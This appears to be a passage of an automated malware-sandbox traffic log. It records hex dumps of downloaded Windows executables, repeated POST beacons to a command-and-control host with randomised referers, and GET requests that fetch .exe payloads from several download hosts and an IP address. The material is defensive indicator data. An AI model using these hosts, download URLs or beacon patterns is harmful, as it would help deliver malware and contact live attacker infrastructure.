                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:46 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 
00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:07 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 
00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 
9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rftojqy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 230 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oeicpl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 339 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gmlcwn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pmxge.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 292 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://klnnrs.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 120 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sqgycmxrcw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 127 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ordgyi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 316 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gdpbobblv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 356 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ojnph.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 147 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qnhvcpx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 191 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ukmdaxlu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 352 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cocugqsn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 361 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bcdqnjq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 343 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://quobomy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 169 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hfkcwyd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lhmfcrnoc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rwnoc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 246 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hyhfejnsaf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 139 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yupkrg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 183 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xasgjbpj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 316 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dlsrcuywsx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 324 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ygpvsdtxwa.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 226 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ctudyypa.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 338 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fnqfdlb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 316 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qernbnk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lymetcvj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 230 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dwyid.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 236 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rtyuw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 206 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iymvh.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 259 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aujnrph.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 126 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qjfqvve.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 245 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://betkhbcokn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://buvim.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 281 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tuwgresxff.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 177 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://esfdrx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 357 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gimbqwejt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: host-data-coin-11.com
